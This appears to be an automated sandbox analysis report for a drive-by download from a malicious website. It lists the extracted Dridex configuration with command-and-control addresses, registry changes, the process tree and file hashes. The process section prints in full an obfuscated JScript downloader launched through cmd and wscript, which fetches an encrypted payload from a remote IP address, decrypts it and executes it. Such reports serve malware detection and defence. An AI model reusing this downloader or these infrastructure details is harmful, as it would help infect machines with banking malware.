Analysis
-
max time kernel
134s -
max time network
141s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
02-06-2021 08:33
Static task
static1
URLScan task
urlscan1
Sample
http://magickpeoplenew.xyz/
General
Malware Config
Extracted
dridex
10111
162.214.106.107:13783
46.231.204.10:8172
Signatures
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\zmseu.exe cryptone C:\Users\Admin\AppData\Local\Temp\zmseu.exe cryptone -
Blocklisted process makes network request 1 IoCs
Processes:
wscript.exeflow pid process 28 3588 wscript.exe -
Executes dropped EXE 1 IoCs
Processes:
zmseu.exepid process 4168 zmseu.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
zmseu.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA zmseu.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "329388027" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$WordPress iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\FileVersion = "2016061511" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$blogger iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\NextUpdateDate = "329436613" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Discuz! iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Telligent iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30889866" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30889866" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$MediaWiki iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{C59B924F-C37D-11EB-A11C-7E556571BED2} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2600291866" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate\NextUpdateDate = "329404621" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2590917258" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30889866" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2591072987" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$http://www.typepad.com/ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 3 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 4 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
iexplore.exepid process 2208 iexplore.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 2208 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 2208 iexplore.exe 2208 iexplore.exe 1796 IEXPLORE.EXE 1796 IEXPLORE.EXE 1796 IEXPLORE.EXE 1796 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
iexplore.exeIEXPLORE.EXEcmd.exewscript.execmd.exedescription pid process target process PID 2208 wrote to memory of 1796 2208 iexplore.exe IEXPLORE.EXE PID 2208 wrote to memory of 1796 2208 iexplore.exe IEXPLORE.EXE PID 2208 wrote to memory of 1796 2208 iexplore.exe IEXPLORE.EXE PID 1796 wrote to memory of 1388 1796 IEXPLORE.EXE cmd.exe PID 1796 wrote to memory of 1388 1796 IEXPLORE.EXE cmd.exe PID 1796 wrote to memory of 1388 1796 IEXPLORE.EXE cmd.exe PID 1388 wrote to memory of 3588 1388 cmd.exe wscript.exe PID 1388 wrote to memory of 3588 1388 cmd.exe wscript.exe PID 1388 wrote to memory of 3588 1388 cmd.exe wscript.exe PID 3588 wrote to memory of 4124 3588 wscript.exe cmd.exe PID 3588 wrote to memory of 4124 3588 wscript.exe cmd.exe PID 3588 wrote to memory of 4124 3588 wscript.exe cmd.exe PID 4124 wrote to memory of 4168 4124 cmd.exe zmseu.exe PID 4124 wrote to memory of 4168 4124 cmd.exe zmseu.exe PID 4124 wrote to memory of 4168 4124 cmd.exe zmseu.exe
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://magickpeoplenew.xyz/1⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2208 CREDAT:82945 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hj4ZytE5dZgd" "http://31.44.3.115/?MTQ5MDI5&MsTvB&s2ht4=2fn7DVHpqmeCij07eeEALwsF6WTh7S6vB-Lu1Tfwe0jiqEOQE4n9leTF5T8_GqzkLlzRaYg5SA_kCOYgkX_MeRE7Uz3A_xm7JAc5okwBKH7WlTxe4fVlsT4AlAn6nPQqKfrkBzAkY1UgTKLJoioh7BBiPYNT5whvSLRGZ22-rN8sc&oa1n4=x33QcvWfaRuPCYjEM__dSqRGPkvVHliPxo&zvUMeXRuqMzE5MA==" "2""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewsCripT //B //E:JScript 3.tMp "hj4ZytE5dZgd" "http://31.44.3.115/?MTQ5MDI5&MsTvB&s2ht4=2fn7DVHpqmeCij07eeEALwsF6WTh7S6vB-Lu1Tfwe0jiqEOQE4n9leTF5T8_GqzkLlzRaYg5SA_kCOYgkX_MeRE7Uz3A_xm7JAc5okwBKH7WlTxe4fVlsT4AlAn6nPQqKfrkBzAkY1UgTKLJoioh7BBiPYNT5whvSLRGZ22-rN8sc&oa1n4=x33QcvWfaRuPCYjEM__dSqRGPkvVHliPxo&zvUMeXRuqMzE5MA==" "2""4⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c zmseu.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\zmseu.exezmseu.exe6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776MD5
71d7a044701948ca4e59aa37f5d94260
SHA14952051481ef52d8fa5eb95b7832729dfc5e0bb4
SHA256bb7642da343e083585a1b00d995039544037747c542eb7937726692f9c388dfa
SHA51216bb691baa401ac3c5b7424a0bf2248cc1226839960cbe6bf484fc898f4c06a85226181386ecb83064c5bb36de9b099f24294ea044bed3176b67fb0298f5159f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776MD5
eb4e278cf28565d97c25d1b4943d6171
SHA154054fd6e9e9340d8484b775e03a44ea7a300d74
SHA25611ffd302a3cb7d9a6e759770b46f85b190babb2445ab5482ad97781cac12b400
SHA51237ae2d925c7a0a49e3041c263199e9ec58a240070dd313bcbb69d60469d3628f18437f64e0dcc660b159b3b9bd11703c2f78101189b75fdfea491ecba5ee093d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\317KXRBC.cookieMD5
5ebcfad97f1996029771479b350f18cc
SHA128a121674ae2f4d592432b4051ff66eb294f970c
SHA2568ca05547931b118d68d4ef049182efe841856cc042519bdfb2265254382ea04a
SHA512da899d8e36e0897d4f69b4c76e0cb3fccc6585bbd25c68cab5c6f58d355da717a3194b151b3095aa9e0846d66875de8dfa76eb163040cfd506d4da8e6e01a7ea
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\42CKLL15.cookieMD5
94a941e5277e6ef89c5ff5169d8c004a
SHA1a3fc34a2de2e4012431cd19ddcecb56791ae1c72
SHA25605d2a1a1dd487dba84c828b39eccb31953257475c5975457d077181a187e1347
SHA51291642d285c74e742df124206e4331663560860beb60b86d58150eb9222be66058ba7673088464154c1b9368353cf42363c8578cc94bb304158a80a74454ad41c
-
C:\Users\Admin\AppData\Local\Temp\3.tMpMD5
60fc00422b399db85f87d41b8328976d
SHA1bb85034acad8025f97e5bb236443debaf8926e4b
SHA256c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690
SHA51216fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151
-
C:\Users\Admin\AppData\Local\Temp\zmseu.exeMD5
88cdcb149db6ecf35adbdeecb8dcdf35
SHA145445ad72c0ca8c9e1fb5a9c068d0c185f481030
SHA2566a534ae6677f311c1ccc3e0f590ab0b18d50cadce8f662ed3befb67f2efe7ad9
SHA5124dbdec7b254e4a17c3518a1cba0356223ac3116871e626e522320eb87d2233119e3ea5f9f50a9ea462f53f7ab2e229a13e651e98b74a1030ae50e1e262568896
-
C:\Users\Admin\AppData\Local\Temp\zmseu.exeMD5
88cdcb149db6ecf35adbdeecb8dcdf35
SHA145445ad72c0ca8c9e1fb5a9c068d0c185f481030
SHA2566a534ae6677f311c1ccc3e0f590ab0b18d50cadce8f662ed3befb67f2efe7ad9
SHA5124dbdec7b254e4a17c3518a1cba0356223ac3116871e626e522320eb87d2233119e3ea5f9f50a9ea462f53f7ab2e229a13e651e98b74a1030ae50e1e262568896
-
memory/1388-116-0x0000000000000000-mapping.dmp
-
memory/1796-115-0x0000000000000000-mapping.dmp
-
memory/2208-114-0x00007FF834CA0000-0x00007FF834D0B000-memory.dmpFilesize
428KB
-
memory/3588-117-0x0000000000000000-mapping.dmp
-
memory/4124-119-0x0000000000000000-mapping.dmp
-
memory/4168-120-0x0000000000000000-mapping.dmp
-
memory/4168-124-0x0000000000400000-0x0000000000550000-memory.dmpFilesize
1.3MB
-
memory/4168-123-0x0000000000550000-0x000000000069A000-memory.dmpFilesize
1.3MB